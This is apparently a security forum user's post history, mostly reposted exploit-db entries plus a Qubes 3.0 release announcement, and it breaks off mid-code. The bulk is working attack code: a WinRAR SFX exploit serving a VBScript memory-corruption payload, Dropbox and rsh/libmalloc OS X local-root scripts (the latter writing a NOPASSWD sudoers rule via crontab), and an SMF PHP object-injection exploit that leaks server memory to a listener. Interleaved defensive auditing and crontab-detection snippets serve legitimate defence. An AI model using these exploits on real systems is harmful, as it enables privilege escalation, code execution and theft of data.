Posts: 18725
Days Won: 707
Everything posted by Nytro
-
chrome login data.
Nytro replied to theandruala's topic in Reverse engineering & exploit development
As far as I know: "The CryptProtectData function performs encryption on the data in a DATA_BLOB structure. Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer. For information about exceptions, see Remarks."
-
You can see it live, right now.
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Thanks. It no longer works on Chrome, but I fixed it; the fix isn't on GitHub yet. I'll update it, I've done more work on it, but I need to put some kind of license on it so I don't get into trouble if others use it in an "ugly" way.
-
Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)
Nytro replied to Nytro's topic in Exploituri
He probably uses a fuzzer, but he didn't discover all of them in 2 days. They were discovered over a long period, for example a year. On exploit-db they were submitted in bulk (by him or someone else) during that period, which is why they show up then. The Project Zero issues probably show more precise dates.
-
Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)
Nytro replied to Nytro's topic in Exploituri
I don't think Nils is the kind of person who would buy something like this. But I do think he's the kind of person who would find something like this.
-
Qubes 3.0
Oct 1, 2015 • Joanna Rutkowska

About 5 months after the initial release of Qubes 3.0-rc1, we're now releasing the final 3.0 today!

Let me quickly recap the main "killer features" of Qubes OS 3.0 compared to the Release 2:

Qubes is now based on what we call Hypervisor Abstraction Layer (HAL), which decouples Qubes logic from the underlying hypervisor. This will allow us to easily switch the underlying hypervisors in the near future, perhaps even during the installation time, depending on the user needs (think tradeoffs between hardware compatibility and performance vs. security properties desired, such as e.g. reduction of covert channels between VMs, which might be of importance to some users). More philosophically-wise, this is a nice manifestation of how Qubes OS is really "not yet another virtualization system", but rather: a user of a virtualization system (such as Xen).

We upgraded from Xen 4.1 to Xen 4.4 (now that was really easy thanks to HAL), which allowed for: 1) better hardware compatibility (e.g. UEFI coming soon in 3.1), 2) better performance (e.g. via Xen's libvchan that replaced our vchan). Also, a new Qubes qrexec framework that has optimized performance for inter-VM services.

We introduced officially supported Debian templates.

And finally: we integrated Whonix templates, which optimize Tor workflows for Qubes.

As explained in our Release Cycle Documentation (something we finally created and have been polishing through this 3.0 branch development), there are almost no new features in 3.0 compared to 3.0-rc1, essentially only bugfixes, intermixed with a few minor improvements. But, while the 3.0 branch was "maturing", and getting bugfixes merged, most of our work has been focused on the 3.1 branch, which is adding a bunch of exciting new features, as indicated on our high-level roadmap, specifically:

UEFI support (see this ticket for more info and test images).
Live USB edition (a preview of which we already released earlier this summer; now it will get merged into the master branch for 3.1).
Management/pre-configuration stack: The Big Killer Feature of the upcoming 3.1 release, which will make it easy to provide out of the box configurations for things such as: out of the box Whonix/Tor, or Split GPG, or a default USB sandboxing VM, which currently the user must set up manually.

We're planning to release the first candidate for 3.1 as early as the end of October, actually.

But development of any serious project is not just adding new features, although that's admittedly the most exciting thing for any developer to do. In R3 we have finally started implementing this golden thought, and the first tangible outcome of this change of attitude is the automated testing framework which we have been using for all the releases in this 3.0 branch already. We hope this results in much more polished, stable code.

Other things we've started to be increasingly prioritizing recently, and only plan to intensify in the coming year are: 1) making Qubes more accessible to people (think easier to get hardware that can run Qubes OS), and 2) easier to use (better UX and UI). I think this is also pretty exciting, actually.

As previously announced earlier this summer, we have decided to dedicate this release of Qubes OS to the memory of Caspar Bowden: Caspar has been a proud user, supporter, and advocate for Qubes OS, and also a friend. I think he would have liked that dedication.

The Qubes 3.0 ISO can be downloaded from here. We have also released another scheduled Qubes Canary today.

I would like to thank all the people who have contributed to this huge effort of creating a new "reasonably secure" desktop OS. I believe we're making together an important and meaningful thing here. Let's keep this going!

Source: http://blog.invisiblethings.org/2015/10/01/qubes-30.html
-
[h=1]Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)[/h]
Source: https://code.google.com/p/google-security-research/issues/detail?id=474

The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliably on Win 7 32-bit with Special Pool enabled on win32k.sys.

Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip

Source: https://www.exploit-db.com/exploits/38307/
-
[h=1]Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability[/h]
# Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability
# Date: 09/28/2015
# Author: Reigning Shells, based off PoC published by Zero Day Initiative
# Vendor Homepage: adobe.com
# Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable.
# Tested on: Adobe Acrobat 11.0.10 on Windows 7
# CVE : CVE-2015-3073

This vulnerability allows remote attackers to bypass API restrictions on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within AFParseDate. By creating a specially crafted PDF with specific JavaScript instructions, it is possible to bypass the Javascript API restrictions. A remote attacker could exploit this vulnerability to execute arbitrary code.

Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable.

Notes:
The code assumes you attached a DLL named exploit.txt to the PDF document to get around attachment security restrictions. Acrobat will execute updaternotifications.dll if it's in the same directory as the Acrobat executable or the same directory as the document being opened.

Credit for discovery and the initial POC that illustrates code being executed in the privileged context (launching a URL) goes to the Zero Day Initiative.

Code:
https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip

Source: https://www.exploit-db.com/exploits/38344/
-
[h=1]WinRar 5.21 - SFX OLE Command Execution[/h]
#!/usr/bin/python -w
# Title : WinRar SFX OLE Command Execution
# Date : 25/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
#
# Triggering the Vulnerability
# Run this python script
# Right click a file and then click on add to archive.
# check the 'Create SFX archive' box
# go to Advanced tab
# go to SFX options
# go to Text And icon
# copy the code that the script will generate to 'Text to display into sfx windows'
# Click OK two times and the sfx archive is generated.
# If someone opens that sfx archive a calculator should pop up.
#
# Video : https://youtu.be/vIslLJYvnaM
#
import socket

banner = r"""
  ___        __        ____                 _    _
 |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |
  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |
  | || | | | _| (_) | |_| |  __/ | | |   / ___ \| |___
 |___|_| |_|_|  \___/ \____|\___|_| |_|  /_/   \_\_____|
"""
print banner

CRLF = "\r\n"

# OLE command execution: the SFX text box is rendered by the IE engine, so the
# page below (the CVE-2014-6332 VBScript "godmode" technique) runs when the
# archive is opened and launches calc.exe via Shell.Application.
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0) then
    exit function
  end if
  if (instr(info,"MSIE")>0) then
    intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
    exit function
  end if
  win9x=0
  BeginInit()
  If Create()=True Then
    myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
    else
      setnotsafemode()
    end if
  end if
end function

function BeginInit()
  Randomize()
  redim aa(5)
  redim ab(5)
  a0=13+17*rnd(6)
  a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
      Create=True
      Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
  On Error Resume Next
  i=testaa
  i=null
  redim Preserve aa(a2)
  ab(0)=0
  aa(a1)=i
  ab(0)=6.36598737437801E-314
  aa(a1+2)=myarray
  ab(2)=1.74088534731324E-310
  mydata=aa(a1)
  redim Preserve aa(a0)
end function

function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=rum(i+8)
  i=rum(i+16)
  j=rum(i+&h134)
  for k=0 to &h60 step 4
    j=rum(i+&h120+k)
    if(j=14) then
      j=0
      redim Preserve aa(a2)
      aa(a1+2)(i+&h11c+k)=ab(4)
      redim Preserve aa(a0)
      j=0
      j=rum(i+&h120+k)
      Exit for
    end if
  next
  ab(2)=1.69759663316747E-313
  runmumaa()
end function

function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000
  redim Preserve aa(a0)
  redim ab(a0)
  redim Preserve aa(a2)
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  If(IsObject(aa(a1-1)) = False) Then
    if(intVersion<4) then
      mem=cint(a0+1)*16
      j=vartype(aa(a1-1))
      if((j=mem+4) or (j*8=mem+8)) then
        if(vartype(aa(a1-1))<>0) Then
          If(IsObject(aa(a1)) = False ) Then
            type1=VarType(aa(a1))
          end if
        end if
      else
        redim Preserve aa(a0)
        exit function
      end if
    else
      if(vartype(aa(a1-1))<>0) Then
        If(IsObject(aa(a1)) = False ) Then
          type1=VarType(aa(a1))
        end if
      end if
    end if
  end if
  If(type1=&h2f66) Then
    Over=True
  End If
  If(type1=&hB9AD) Then
    Over=True
    win9x=1
  End If
  redim Preserve aa(a0)
end function

function rum(add)
  On Error Resume Next
  redim Preserve aa(a2)
  ab(0)=0
  aa(a1)=add+4
  ab(0)=1.69759663316747E-313
  rum=lenb(aa(a1))
  ab(0)=0
  redim Preserve aa(a0)
end function
</script>
</body>
</html>"""

# Complete HTTP response for the <iframe> request. The original script built
# this but then sent only the bare HTML body; sending the full response is the
# intended behaviour.
response = ("HTTP/1.1 200 OK" + CRLF
            + "Content-Type: text/html" + CRLF
            + "Connection: close" + CRLF
            + "Server: Apache" + CRLF
            + "Content-Length: " + str(len(exploit)) + CRLF
            + CRLF + exploit + CRLF)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input("Enter Local IP: ")
server_address = (host, 8080)
sock.bind(server_address)
print "[+] Server started " + host + " [+]"
sock.listen(1)
print "[+] Insert this code on the 'Text to display into sfx windows' [+]"
print "\n<iframe src='http://" + host + ":8080/'> </iframe>"
print "\n[+] Waiting for request . . . [+]"
connection, client_address = sock.accept()
connection.recv(2048)
print "[+] Got request , sending exploit . . .[+]"
connection.send(response)
connection.close()
print "[+] Exploit sent , A calc should pop up . . [+]"
print "\nhttps://www.infogen.al/\n"

Source: https://www.exploit-db.com/exploits/38319/
-
[h=1]Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit[/h]
#!/bin/bash
# Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
# Google Dork: N/A
# Date: 29/09/15
# Exploit Author: cenobyte
# Vendor Homepage: https://www.dropbox.com
# Software Link: N/A
# Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
# Tested on: OS X Yosemite (10.10.5)
# CVE: N/A
#
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# The setuid root FinderLoadBundle that was included in older DropboxHelperTools
# versions for OS X allows loading of dynamically linked shared libraries
# that are residing in the same directory. The directory in which
# FinderLoadBundle is located is owned by root and that prevents placing
# arbitrary files there. But creating a hard link from FinderLoadBundle to
# somewhere in a directory in /tmp circumvents that protection thus making it
# possible to load a shared library containing a payload which creates a root
# shell.
#
# - vulnerable versions:          | versions not vulnerable:
# Dropbox 3.3.* for Mac           | Dropbox 3.10.* for Mac
# Dropbox 3.1.* for Mac           | Dropbox 3.9.* for Mac
# Dropbox 3.0.* for Mac           | Dropbox 3.8.* for Mac
# Dropbox 2.11.* for Mac          | Dropbox 3.7.* for Mac
# Dropbox 2.10.* for Mac          | Dropbox 3.6.* for Mac
# Dropbox 2.9.* for Mac           | Dropbox 3.5.* for Mac
# Dropbox 2.8.* for Mac           | Dropbox 3.4.* for Mac
# Dropbox 2.7.* for Mac           | Dropbox 3.2.* for Mac
# Dropbox 2.6.* for Mac           | Dropbox 1.5.1-5 for Mac
# Dropbox 2.5.* for Mac           | Dropbox 1.4.* for Mac
# Dropbox 2.4.* for Mac           | Dropbox 1.3.* for Mac
# Dropbox 2.3.* for Mac           |
# Dropbox 2.2.* for Mac           |
# Dropbox 2.1.* for Mac           |
# Dropbox 1.7.* for Mac           |
# Dropbox 1.6.* for Mac           |
# Dropbox 1.5.6 for Mac           |
#
# The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
# However, there is no mention of this issue at the Dropbox release notes:
# https://www.dropbox.com/release_notes
#
# It seems that one of the fixes implemented in FinderLoadBundle is a
# check whether the path of the bundle is a root owned directory making it
# impossible to load arbitrary shared libraries as a non-privileged user.
#
# I am not sure how to find the exact version of the FinderLoadBundle executable
# but the included Info.plist contained the following key:
# <key>CFBundleShortVersionString</key>
# This key is no longer present in the plist file of the latest version. So I
# included a basic vulnerable version checker that checks for the presence of
# this key.
#
# - exploit details:
# I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
# used. This exploit relies on Xcode for the shared library + root shell to be
# compiled. After successful exploitation a root shell is left in a directory in
# /tmp so make sure you delete it on your own system when you are done testing.
#
# - example:
# $ ./dropboxfinderloadbundle.sh
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
#
# [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
# [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
# [-] constructing bundle
# [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
# [-] compiling root shell
# [-] executing FinderLoadBundle using root shell payload
# [-] entering root shell
# bash-3.2# id -P
# root:********:0:0::0:0:System Administrator:/var/root:/bin/sh

readonly __progname=$(basename $0)

errx() {
	echo "$__progname: $@" >&2
	exit 1
}

main() {
	local -r tmp=$(head -10 /dev/urandom | md5)
	local -r helpertools="/Library/DropboxHelperTools"
	local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
	local -r bundletarget="$bundle/mach_inject_bundle_stub"
	local -r bundlesrc="${bundletarget}.c"
	local -r sh="/tmp/$tmp/boomsh"
	local -r shsrc="${sh}.c"
	local -r cfversion="CFBundleShortVersionString"
	local -r findbin="FinderLoadBundle"

	echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
	echo

	uname -v | grep -q ^Darwin || \
		errx "this Dropbox exploit only works on OS X"

	[ ! -d "$helpertools" ] && \
		errx "$helpertools does not exist"

	which -s gcc || \
		errx "gcc not found"

	# locate a setuid root (mode 0104xxx) FinderLoadBundle
	found=0
	for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
		stat -s "$finder" | grep -q "st_mode=0104"
		if [ $? -eq 0 ]; then
			found=1
			break
		fi
	done

	[ $found -ne 1 ] && \
		errx "couldn't find a setuid root $findbin"

	local -r finderdir=$(dirname $finder)
	local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"

	[ -f "$plist" ] || \
		errx "FinderLoadBundle not vulnerable (cannot open $plist)"

	grep -q "<key>$cfversion</key>" "$plist" || \
		errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"

	echo "[-] creating temporary directory: /tmp/$tmp"
	mkdir /tmp/$tmp || \
		errx "couldn't create /tmp/$tmp"

	# the hard link keeps setuid root but moves the binary into our directory
	echo "[-] linking $finder"
	ln "$finder" "/tmp/$tmp/$findbin" || \
		errx "ln $finder /tmp/$tmp/$findbin failed"

	echo "[-] constructing bundle"
	mkdir -p "$bundle" || \
		errx "cannot create $bundle"

	# library constructor: runs as root inside FinderLoadBundle and makes
	# the compiled shell setuid root
	cat > "$bundlesrc" <<EOF
#include <sys/stat.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
extern void init(void) __attribute__ ((constructor));
void init(void)
{
	setuid(0);
	setgid(0);
	chown("$sh", 0, 0);
	chmod("$sh", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);
}
EOF

	echo "[-] creating $shsrc"
	cat > "$shsrc" <<EOF
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int
main()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
	return(0);
}
EOF

	echo "[-] compiling root shell"
	gcc "$shsrc" -o "$sh" || \
		errx "gcc failed for $shsrc"

	gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
		errx "gcc failed for $bundlesrc"

	echo "[-] executing $findbin using root shell payload"
	cd "/tmp/$tmp"
	./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
	[ $? -ne 4 ] && \
		errx "exploit failed, $findbin seems not vulnerable"

	[ ! -f "$sh" ] && \
		errx "$sh was not created, exploit failed"

	stat -s "$sh" | grep -q "st_mode=0104" || \
		errx "$sh was not set to setuid root, exploit failed"

	echo "[-] entering root shell"
	"$sh"
}

main "$@"

exit 0

Source: https://www.exploit-db.com/exploits/38360/
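The bug class above is general: a setuid-root program that loads code relative to its own location trusts a directory the caller controls as soon as the caller can hard-link the binary elsewhere (a hard link keeps the owner and the setuid bit, only dirname(argv[0]) changes). Added example, not part of cenobyte's script: a small auditor that reports the setuid bits of a binary and the writability of its directory, walks a tree for setuid-root files (what the script does for /Library/DropboxHelperTools/Dropbox_u*/FinderLoadBundle), and tries the `ln` step empirically. Assumptions: POSIX stat semantics; on Linux the probe is refused with EPERM when fs.protected_hardlinks=1 and the file is not yours, on OS X of that era it succeeds. The fixture file is constructed and owned by the current user, so the bits are testable without root.

```python
import errno
import os
import stat
import tempfile


def setuid_status(path):
    """Describe a file's setuid/setgid bits and its parent directory's exposure."""
    st = os.stat(path)
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    return {
        "setuid": bool(st.st_mode & stat.S_ISUID),
        "setgid": bool(st.st_mode & stat.S_ISGID),
        "setuid_root": bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0,
        "dir_owned_by_root": pst.st_uid == 0,
        # group/world-writable parent: a local user can drop files next to the binary
        "dir_writable_by_others": bool(pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
    }


def hardlink_probe(path):
    """Attempt the exploit's `ln` step as the current user.

    "linked":       a hard link was created, so the binary can be made to run
                    from a directory the caller controls (then removed again)
    "blocked":      the kernel refused (EPERM/EACCES; e.g. Linux protected_hardlinks)
    "cross-device": scratch dir is on another filesystem, result inconclusive
    """
    scratch = tempfile.mkdtemp(prefix="sulink-")
    link = os.path.join(scratch, os.path.basename(path))
    try:
        os.link(path, link)
        return "linked"
    except OSError as e:
        if e.errno == errno.EXDEV:
            return "cross-device"
        if e.errno in (errno.EPERM, errno.EACCES):
            return "blocked"
        raise
    finally:
        if os.path.lexists(link):
            os.unlink(link)
        os.rmdir(scratch)


def find_setuid_root(root):
    """Return regular files under `root` that are setuid and owned by root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(p)
    return hits


def make_sample_setuid_file():
    """Constructed fixture: a file owned by the current user with the setuid bit
    set (chmod 4755 is allowed on your own file), inside a 0700 scratch dir."""
    d = tempfile.mkdtemp(prefix="suaudit-")
    p = os.path.join(d, "FinderLoadBundle")
    with open(p, "wb") as f:
        f.write(b"#!/bin/sh\nexit 4\n")
    os.chmod(p, 0o4755)
    return p


if __name__ == "__main__":
    import sys
    targets = sys.argv[1:] or find_setuid_root("/Library/DropboxHelperTools")
    for target in targets:
        print(target, setuid_status(target), hardlink_probe(target))
```

The interesting combination on a real host is `setuid_root` true together with `hardlink_probe` returning "linked": that is the precondition the script exploits, and the fix Dropbox shipped (refusing bundles whose path is not a root-owned directory) is what turns a "linked" result back into a harmless one.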
-
[h=1]Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation[/h]
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel

import os, time, sys

env = {}
s = os.stat("/etc/sudoers").st_size

# libmalloc honours these variables inside the setuid rsh, so the malloc log,
# which embeds the attacker-controlled directory string, is written to
# /etc/crontab as root. cron then runs the smuggled line.
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

sys.stderr.write("creating /etc/crontab..")

p = os.fork()

if p == 0:
    os.close(1)
    os.close(2)
    os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)

time.sleep(1)

if "NOPASSWD" not in open("/etc/crontab").read():
    sys.stderr.write("failed\n")
    sys.exit(-1)

sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")

while os.stat("/etc/sudoers").st_size == s:
    sys.stderr.write(".")
    time.sleep(1)

sys.stderr.write("\ndone\n")
os.system("sudo su")

Source: https://www.exploit-db.com/exploits/38371/
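The persistence artefact this chain leaves behind is distinctive: /etc/crontab ends up containing a malloc log (lines that are not valid crontab syntax) plus one cron entry that appends a NOPASSWD rule to /etc/sudoers. Added example, not part of rebel's exploit: detection logic a responder can run over /etc/crontab, flagging lines that do not parse as `schedule user command` and entries whose command touches sudoers. The exact libmalloc log layout is not reproduced (the header line in the sample is a constructed stand-in); the injected cron line is the one the exploit above writes.

```python
import re

# /etc/crontab format: five schedule fields, a user name, then the command
CRON_LINE = re.compile(
    r"^(?P<min>\S+)\s+(?P<hour>\S+)\s+(?P<dom>\S+)\s+(?P<mon>\S+)\s+(?P<dow>\S+)"
    r"\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
AT_LINE = re.compile(r"^(?P<sched>@(reboot|yearly|annually|monthly|weekly|daily|hourly))"
                     r"\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
# one schedule field: *, number or 3-letter name, optional range and step, comma-separated
FIELD_ITEM = r"(\*|[0-9]+|[A-Za-z]{3})(-([0-9]+|[A-Za-z]{3}))?(/[0-9]+)?"
SCHEDULE_FIELD = re.compile("^%s(,%s)*$" % (FIELD_ITEM, FIELD_ITEM))
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")  # SHELL=, PATH=, MAILTO=
SUSPICIOUS_CMD = re.compile(r"/etc/sudoers|NOPASSWD|/etc/passwd|/etc/master\.passwd|chmod\s+[ugoa]*\+?s",
                            re.IGNORECASE)


def parse_crontab(text):
    """Return findings as (lineno, kind, detail) with kind in {"garbage", "suspicious"}."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        m = AT_LINE.match(line)
        if m is None:
            m = CRON_LINE.match(line)
            if m is None or not all(SCHEDULE_FIELD.match(m.group(f))
                                    for f in ("min", "hour", "dom", "mon", "dow")):
                # not a crontab entry at all: what a malloc log dumped into the file looks like
                findings.append((n, "garbage", line))
                continue
        if SUSPICIOUS_CMD.search(m.group("cmd")):
            findings.append((n, "suspicious", "%s: %s" % (m.group("user"), m.group("cmd"))))
    return findings


def check_crontab_file(path="/etc/crontab"):
    with open(path) as f:
        return parse_crontab(f.read())


# Constructed sample (not captured from a real host). Line 5 stands in for the
# malloc log header; lines 6-7 are the MallocStackLoggingDirectory string the
# exploit above injects, followed by its padding newlines.
SAMPLE_CRONTAB = """\
# /etc/crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/bin:/bin
15 3 * * * root periodic daily
malloc_history: stack logs for pid 512 (constructed stand-in for the libmalloc log header)
a
* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers



"""

if __name__ == "__main__":
    for lineno, kind, detail in parse_crontab(SAMPLE_CRONTAB):
        print("line %d [%s] %s" % (lineno, kind, detail))
```

Two "garbage" findings followed by a "suspicious" root entry is the signature; on a clean system the parser should return nothing for /etc/crontab. The same schedule check also catches other log-to-file primitives that land in cron directories, since any file written by a logger fails the five-field test.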
-
Yes, we also thought about some of them, but I don't know who would have time for something like that...
-
Who's making a topic for each one (that doesn't already exist)?
-
I also looked for the Defcon ones, but I couldn't find them. I recommend to everyone: "When IoT Attacks: Hacking A Linux-Powered Rifle"! It's fun. Want root on a gun? Watch the video.
-
I watched two of them last night: 1. Red Team vs Blue Team - Must watch! 2. Bypass Control Flow Guard - Good content, crappy presentation. That Chinese guy's English is even worse than mine.
-
How did they show up so fast? Should I download them before they get deleted (since they weren't uploaded by the staff)?
-
[h=1]SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit[/h]
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#############################################################################
# Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit
# Authors: Andrea Palazzo <andrea [dot] palazzo [at] truel [dot] it>
#          Filippo Roncari <filippo [dot] roncari [at] truel [dot] it>
# Truel Lab ~ http://lab.truel.it
# Requirements: SMF <= 2.0.10
#               PHP <= 5.6.11 / 5.5.27 / 5.4.43
# Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt
#             TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt
#             TL-2015-SMF01 n/y/a
# Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/
# Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs
############################################################################

import sys, requests, time, os, socket, thread, base64, string, urllib
from multiprocessing import Process

# Payload Config
bytes_num = 0    # num of bytes to dump
address = 0      # starting memory address

# Target Config
cookie = {'PHPSESSID': '000'}                      # SMF session cookie
target_host = 'http://localhost/smf/index.php'     # URL of target installation index.php
csrftoken = ''

# Local Server Config
host = "localhost"
port = 31337

# Memory dump variables
dumped = ''
current_dump = ''
in_string = False
brute_index = 0
brute_list = list(string.ascii_letters + string.digits)

r_ok = 'HTTP/1.0 200 OK' + '\n'
r_re = 'HTTP/1.0 302 OK' + '\n'
r_body = '''Server: Truel-Server
Content-Type: text/xml
Connection: keep-alive
Content-Length: 395

<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
 <env:Header>
  <n:alertcontrol xmlns:n="http://example.org/alertcontrol">
   <n:priority>1</n:priority>
   <n:expires>2001-06-22T14:00:00-05:00</n:expires>
  </n:alertcontrol>
 </env:Header>
 <env:Body>
  <m:alert xmlns:m="http://example.org/alert">
   <m:msg>Truel</m:msg>
  </m:alert>
 </env:Body>
</env:Envelope>'''


def serverStart():
    print "[+] Setting up local server on port " + str(port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    if not sock:
        print "[X] Fatal Error: Unable to create socket"
    sock.bind((host, port))
    sock.listen(1)
    return sock


def getToken():
    global csrftoken
    print "[+] Trying to get a valid CSRF token"
    for n in range(3):    # 3 attempts
        r = requests.get(target_host, cookies=cookie, allow_redirects=False)
        r = r.text
        if (r.find("action=logout;") != -1):
            break
    start = r.find("action=logout;")
    if (start != -1):
        end = (r[start+14:]).find('">')
        csrftoken = r[start+14 : start+end+14]
        print "[+] Authentication done. Got token " + str(csrftoken)
        return True
    else:
        print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
        return False


def prepareForExploit():
    if not (getToken()):    # get CSRF token
        os._exit(1)
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
    r = requests.get(target, cookies=cookie, allow_redirects=False)    # necessary request
    return


def forgePayload(current_try, address):
    # DateInterval -> Exception -> SoapClient chain; the SoapClient is pointed at
    # our listener through _proxy_host/_proxy_port and carries the address to read
    location = "http://" + current_try
    payload = ('O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{'
               's:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";'
               's:8:"location";s:' + str(len(location)) + ':"' + location + '";'
               's:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';'
               'i:1;i:' + str(address) + ';}}'
               's:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";'
               's:11:"_proxy_port";i:' + str(port) + ';}}}')
    return payload


def sendPayload(payload, null):
    # where injection happens
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload))
    try:
        r = requests.get(target, cookies=cookie, allow_redirects=False)
    except requests.exceptions.RequestException:
        print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
        os._exit(1)
    return


def limitReached(dumped):
    if (len(dumped) >= bytes_num):
        return True
    else:
        return False


def printDumped(dumped):
    d = " "
    cnt = 1
    print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
    print "[+] ======================= Dumped Data ======================="
    for i in range(bytes_num):
        d = d + str(dumped[i])
        if (cnt % 48 == 0):
            print d
            d = " "
        if (cnt == bytes_num):
            print d
        cnt = cnt + 1


def getSoapRequest(sock):
    connection, sender = sock.accept()
    request = connection.recv(8192)
    return (connection, request)


def sendSoapResponse(connection, content):
    connection.send(content)
    connection.close()
    return


def getDumpedFromHost(request):
    # the leaked byte arrives as the first character of the Host header
    i = request.find("Host: ") + 6
    v = request[i:i+1]
    return v


def pushDumped(value, string):
